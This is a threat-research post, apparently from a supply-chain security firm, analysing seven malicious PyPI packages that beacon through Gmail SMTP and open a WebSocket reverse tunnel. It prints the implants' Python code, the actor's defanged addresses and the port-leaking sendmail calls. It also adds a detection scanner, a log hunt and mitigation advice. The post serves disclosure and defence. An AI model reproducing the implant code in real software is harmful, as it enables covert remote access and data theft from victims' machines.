
Research
Olivia Brown
April 30, 2025
Socket’s Threat Research Team uncovered seven malicious Python packages designed to open a reverse tunnel into the infected machine, using Gmail as the signaling channel. The threat actor’s email addresses are the only clue to their motivation, but once the tunnel is up the actor can exfiltrate data or execute commands that we cannot observe through the packages alone. All seven packages use Gmail’s SMTP server, which makes the activity less likely to be flagged by firewalls and endpoint detection systems, since outbound SMTP to a well-known mail provider is commonly treated as legitimate traffic.
These packages have since been removed from the Python Package Index (PyPI).
Coffin-Codes-Pro
Coffin-Codes-Pro establishes a connection to Gmail’s SMTP server using hardcoded credentials, namely sphacoffin@gmail[.]com and a password. It then sends a message to a second email address, blockchain[.]bitcoins2020@gmail[.]com, politely and demurely signaling that the implant is working.
import sys
import json
import threading
import smtplib
import websockets
import ssl
import certifi
from .tcp import Client

# TLS context reused for the WebSocket command-and-control connection below
ssl_context = ssl.create_default_context()
ssl_context.load_verify_locations(certifi.where())

# Beacon: authenticate to Gmail over SMTPS (port 465) with the hardcoded
# operator account, then mail a second operator-controlled drop address
srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
srv.ehlo()
srv.login("sphacoffin@gmail[.]com", "[redacted]")
srv.sendmail("sphacoffin@gmail[.]com",
             "blockchain.bitcoins2020@gmail[.]com",
             "SHIT INCOMIN")
Next, it opens a WebSocket connection to the given URI, which acts as the command and control channel. The first message it receives carries the tunnel port assignment, and it emails the public_server_port to the same drop address.
async def open_tcp_tunnel(ws_uri, remote_server_host, local_server_port):
    # Outbound WebSocket to the operator's server: this is the C2 channel
    async with websockets.connect(ws_uri, ssl=ssl_context) as websocket:
        # The first message assigns the public and private tunnel ports
        message = json.loads(await websocket.recv())
        local_server_host = '127.0.0.1'
        public_server_port = message["public_server_port"]
        private_server_port = message["private_server_port"]
        # Leak the public port to the operator's drop mailbox over SMTP
        srv.sendmail("sphacoffin@gmail[.]com",
                     "blockchain.bitcoins2020@gmail[.]com",
                     str(public_server_port))
        #print(f"\033[32m{'Tunnel Status':<25}Online\033[00m")
        #print(f"{'Forwarded':<25}{f'{remote_server_host}:{public_server_port} → 127.0.0.1:{local_server_port}'}")
Finally, it starts a TCP forwarder between the remote host and the local service. For each new connection instruction received over the WebSocket, it spawns a thread that processes that connection through the tunnel. The Client class is defined in the package’s tcp.py if you would like to dive further. Essentially, it provides bidirectional data forwarding over the WebSocket, which punches through firewalls and NAT because the tunnel is initiated outbound from the infected machine. Gmail is not part of the data path: it only carries the beacon and the public port number the operator needs in order to reach the tunnel.
        # Bidirectional TCP forwarder between the operator's server and the local service
        client = Client(
            remote_server_host=remote_server_host,
            remote_server_port=private_server_port,
            local_server_host=local_server_host,
            local_server_port=local_server_port,
        )
        # Every subsequent WebSocket message is a new inbound connection to relay
        while True:
            message = json.loads(await websocket.recv())
            #print("New Connection +1")
            threading.Thread(target=client.process,
                             args=(message, websocket)).start()
Previously, threat actors used this tactic to siphon Solana private keys. The hardcoded account names here (blockchain.bitcoins2020, btcchain2) suggest this actor is likewise interested in cryptocurrency. Whatever the motive, the reverse tunnel gives the attacker access to internal dashboards, APIs, or admin panels that are reachable only from the victim’s machine. The attacker could transfer files, execute shell commands or scripts, harvest credentials, and use this access to pivot further into the network.
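As an added example (not code from the Coffin-Codes packages and not a Socket tool), the following static triage script shows how the pattern above can be caught before a package is ever installed: it walks the Python AST of an untrusted source file and flags SMTP_SSL setup against Gmail, login() with two string literals (hardcoded credentials), sendmail() to a literal recipient (a fixed drop address), and websockets.connect() as the tunnel channel. The two sample sources it scans, including their addresses and password, are constructed for the example.

```python
"""Static triage for the Gmail beacon + WebSocket tunnel pattern.

Added example: this is not code from the Coffin-Codes packages or from
Socket. It walks the AST of untrusted Python source and reports the
building blocks seen in Coffin-Codes-Pro without executing anything.
"""
import ast
from dataclasses import dataclass

GMAIL_SMTP_HOSTS = {"smtp.gmail.com"}
# Calls that open the outbound control channel (websockets is what the
# packages use; websocket-client's create_connection is a common alternative)
TUNNEL_CALLS = {"websockets.connect", "websocket.create_connection"}


@dataclass
class Finding:
    rule: str
    line: int
    detail: str


def _dotted_name(node):
    """Turn a Name/Attribute chain such as smtplib.SMTP_SSL into 'smtplib.SMTP_SSL'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _literal_str(node):
    """Return the value of a string literal argument, or None for anything dynamic."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def scan_source(src, filename="<module>"):
    """Return a list of Findings for one Python source file."""
    findings = []
    for node in ast.walk(ast.parse(src, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func) or ""
        args = [_literal_str(a) for a in node.args]
        if name.endswith(("SMTP_SSL", "SMTP")) and args and args[0] in GMAIL_SMTP_HOSTS:
            findings.append(Finding("smtp-gmail-host", node.lineno, args[0]))
        # login("user", "pass") with both arguments literal: credentials baked in
        if name.endswith(".login") and len(args) >= 2 and args[0] is not None and args[1] is not None:
            findings.append(Finding("hardcoded-smtp-credentials", node.lineno, args[0]))
        # sendmail(from, to, ...) with a literal recipient: a fixed drop address
        if name.endswith(".sendmail") and len(args) >= 2 and args[1] is not None:
            findings.append(Finding("literal-recipient", node.lineno, args[1]))
        if name in TUNNEL_CALLS:
            findings.append(Finding("websocket-connect", node.lineno, name))
    return findings


def classify(findings):
    """Collapse findings into a verdict a CI gate can act on."""
    rules = {f.rule for f in findings}
    if {"hardcoded-smtp-credentials", "websocket-connect"} <= rules:
        return "tunnel-with-email-signaling"
    if "hardcoded-smtp-credentials" in rules:
        return "hardcoded-smtp-credentials"
    return "clean"


# Constructed sample modelled on the snippets above; addresses and password are placeholders.
MALICIOUS_SAMPLE = '''
import json, smtplib, websockets
srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
srv.ehlo()
srv.login("operator@example.com", "hunter2")
srv.sendmail("operator@example.com", "drop@example.com", "implant online")

async def open_tcp_tunnel(ws_uri):
    async with websockets.connect(ws_uri) as websocket:
        message = json.loads(await websocket.recv())
        srv.sendmail("operator@example.com", "drop@example.com",
                     str(message["public_server_port"]))
'''

# Constructed benign sample: same library, but credentials come from the environment.
BENIGN_SAMPLE = '''
import os, smtplib
def notify(body):
    srv = smtplib.SMTP_SSL(os.environ["SMTP_HOST"], 465)
    srv.login(os.environ["SMTP_USER"], os.environ["SMTP_PASS"])
    srv.sendmail(os.environ["SMTP_USER"], os.environ["ALERT_TO"], body)
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        findings = scan_source(src)
        print(label, classify(findings))
        for f in sorted(findings, key=lambda f: f.line):
            print(f"  line {f.line}: {f.rule} ({f.detail})")
```

The benign sample uses exactly the same smtplib calls but reads credentials from the environment, so none of the literal-argument rules fire; the point is to flag baked-in accounts and drop addresses, not mail itself. Run it over every .py file in a wheel or sdist before it reaches a developer machine, and treat the combined credentials-plus-WebSocket verdict as a block rather than a warning.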
Coffin-Codes-Net2
Coffin-Codes-Net2 is the most recent package listed on the PyPI page, newer by a day than Coffin-Codes-Pro above.
srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
srv.ehlo()
# Authenticates as a different operator account, but the envelope sender
# and drop address are unchanged
srv.login("hackingbsb@gmail[.]com", "{redacted}")
srv.sendmail("sphacoffin@gmail[.]com",
             "blockchain.bitcoins2020@gmail[.]com", "SHIT INCOMIN")
Again the actor opens a TLS-wrapped SMTP session to Gmail on port 465, and the script sends mail automatically with no user action or visibility. This time it authenticates with a different hardcoded account, hackingbsb@gmail[.]com, and the same password. It then sends the same very polite and demure plain-text beacon with sphacoffin@gmail[.]com as the sender to blockchain[.]bitcoins2020@gmail[.]com. Finally, it mails the forwarded port number, so the attacker learns from outside which port the victim’s machine is exposing through the tunnel, ready for further exploitation.
Coffin-Codes-NET
Here, the logic is overall similar to the packages above.
srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
srv.ehlo()
srv.login("btcchain2@gmail[.]com", "{redacted}")
srv.sendmail("sphacoffin@gmail[.]com", "blockchain.bitcoins2020@gmail[.]com",
             "SHIT INCOMIN")
srv.sendmail("sphacoffin@gmail[.]com", "blockchain.bitcoins2020@gmail[.]com",
             str(public_server_port))
This code is nearly identical in functionality and structure to the one above, with one clear difference: it logs in as btcchain2@gmail[.]com. Since PyPI dates this package to February 2022, we can conclude the threat actor has been working on this tooling for at least three years.
Coffin-Codes-2022
Poorly named, since its last release according to PyPI was in 2021, Coffin-Codes-2022 uses the same logic but with the sender address sphacoffin@gmail[.]com as the authenticated account.
srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
srv.ehlo()
srv.login("sphacoffin@gmail[.]com", "{redacted}")
srv.sendmail("sphacoffin@gmail[.]com",
             "blockchain.bitcoins2020@gmail[.]com", "SHIT INCOMIN")
Notably, the threat actor uses the same password every time.
Coffin2022
Similarly poorly named, since its last release according to PyPI was again in 2021, Coffin2022 is essentially identical to Coffin-Codes-2022.
srv.login("sphacoffin@gmail[.]com", "{redacted}")
srv.sendmail("sphacoffin@gmail[.]com",
             "blockchain.bitcoins2020@gmail[.]com", "SHIT INCOMIN")
srv.sendmail("sphacoffin@gmail[.]com",
             "blockchain.bitcoins2020@gmail[.]com", str(public_server_port))
Coffin-Grave
Coffin-Grave, released at the same time as Coffin2022 and Coffin-Codes-2022, is functionally identical to them and adds no new IOCs.
cfc-bsb
This is the oldest and least malicious version, last released Mar 17, 2021. The package implements an asynchronous WebSocket-based HTTP tunneling tool, similar to ngrok, with branding that continues the “Coffin Codes” theme. It connects to wss[://]open[.]jprq[.]live and proxies traffic to a local HTTP service, serializing and de-serializing messages with JSON and Base64 rather than BSON. This version lacks the email exfiltration logic of the later variants: there is no smtplib, no hardcoded credentials, and no overt port leakage. It still retains suspicious traits that enable abuse for remote access, data smuggling, or botnet communication, and covert network tunneling with unverified message handling constitutes a security risk even in the absence of exfiltration code.
The unverified GitHub link on the PyPI page no longer resolves. If you edit the link https[://]github.com[/]azimjohn[/]jprq-py to https[://]github.com[/]azimjohn[/]jprq, you reach a members-only service for exposing local services to the internet, with 24 contributors, 1.3k stars, and 178 forks. It is therefore likely that the GitHub link for this package pointed to a package impersonating the legitimate jprq tool, or was otherwise intended to associate this package with it.
Watch for unusual outbound connections, especially SMTP traffic from hosts that have no business sending mail, since attackers can use legitimate services like Gmail to carry stolen data and beacons. Do not trust a package solely because it has existed for years without being taken down: Coffin-Codes-NET sat on PyPI from February 2022. To protect your codebase, verify package authenticity by checking download counts, publisher history, and whether the linked GitHub repository actually exists and matches the published code. Regular dependency audits help catch unexpected or malicious packages early. Keep strict access controls on private keys, carefully limiting who can view or import them in development. Use isolated, dedicated environments when testing third-party scripts to contain potentially harmful code.
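As an added example that is not part of Socket’s post or tooling, here is a small hunt over Zeek-style ssl.log records that operationalizes the first recommendation: flag any host outside the mail-relay allowlist that authenticates to Gmail over 465, and escalate when the same host also opens a TLS session to an unfamiliar destination within a few minutes, which is the beacon-then-WebSocket sequence seen in Coffin-Codes-Pro. The log lines, IP addresses, allowlists and the tunnel.example.net hostname are constructed for the example, and the sample uses a reduced set of Zeek’s ssl.log columns.

```python
"""Hunt over Zeek-style ssl.log records for the activity described above.

Added example with constructed data: not a Socket tool and not the
packages' code. A workstation that authenticates to smtp.gmail.com on
465 and, within a few minutes, opens a TLS session to a host nobody has
allowlisted matches the beacon-then-tunnel sequence of Coffin-Codes-Pro.
"""
from collections import defaultdict

SMTP_SNI = {"smtp.gmail.com"}
# Destinations a developer box is expected to reach over 443 (constructed allowlist)
KNOWN_SNI = {"pypi.org", "files.pythonhosted.org", "github.com", "smtp.gmail.com"}
# Hosts that are allowed to speak SMTPS at all (constructed)
MAIL_RELAYS = {"10.0.0.25"}

# Constructed sample using a reduced set of Zeek ssl.log columns:
# ts id.orig_h id.resp_h id.resp_p server_name
SAMPLE_SSL_LOG = """
#fields ts id.orig_h id.resp_h id.resp_p server_name
1745971200.0 10.0.1.42 142.250.80.109 465 smtp.gmail.com
1745971203.5 10.0.1.42 203.0.113.10 443 tunnel.example.net
1745971300.0 10.0.1.7 151.101.1.63 443 pypi.org
1745971400.0 10.0.0.25 142.250.80.109 465 smtp.gmail.com
1745975000.0 10.0.1.9 142.250.80.109 465 smtp.gmail.com
"""


def parse_ssl_log(text):
    """Parse whitespace-separated ssl.log lines (Zeek's own output is tab-separated)."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, orig_h, resp_h, resp_p, sni = line.split()
        records.append({"ts": float(ts), "orig_h": orig_h, "resp_h": resp_h,
                        "resp_p": int(resp_p), "sni": sni})
    return records


def hunt(records, window=300):
    """One alert per source host that used Gmail SMTPS without being a mail relay.

    severity is 'high' when an unfamiliar TLS destination (the likely
    WebSocket control channel) appears within `window` seconds of an
    SMTP session from the same host, otherwise 'medium'.
    """
    by_host = defaultdict(list)
    for r in records:
        by_host[r["orig_h"]].append(r)
    alerts = []
    for host, recs in sorted(by_host.items()):
        if host in MAIL_RELAYS:
            continue
        smtp = [r for r in recs if r["resp_p"] == 465 and r["sni"] in SMTP_SNI]
        if not smtp:
            continue
        unfamiliar = [r for r in recs
                      if r["resp_p"] == 443 and r["sni"] != "-" and r["sni"] not in KNOWN_SNI]
        near = sorted({u["sni"] for u in unfamiliar
                       for s in smtp if abs(u["ts"] - s["ts"]) <= window})
        alerts.append({"host": host,
                       "severity": "high" if near else "medium",
                       "smtp_ts": min(s["ts"] for s in smtp),
                       "tunnel_sni": near})
    return alerts


if __name__ == "__main__":
    for a in hunt(parse_ssl_log(SAMPLE_SSL_LOG)):
        print(a)
```

The medium-severity alert for a host that only spoke to smtp.gmail.com is deliberate: a developer workstation has little reason to authenticate to an SMTP server at all, and the tunnel’s WebSocket endpoint may use a hostname your allowlist has never seen, so the SMTPS event alone is worth a look even when the correlation does not fire.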
The Socket GitHub app provides an excellent defense by scanning python dependencies in pull requests, catching malicious or typosquatted packages before they enter your project. The Socket CLI delivers real-time analysis during npm installs for local development and CI pipelines. The Socket browser extension seamlessly scans for suspicious packages while you browse PyPI or GitHub, highlighting threats instantly.
T1102.002 - Web Service: Bidirectional Communication
blockchain[.]bitcoins2020@gmail[.]com
sphacoffin@gmail[.]com
btcchain2@gmail[.]com
hackingbsb@gmail[.]com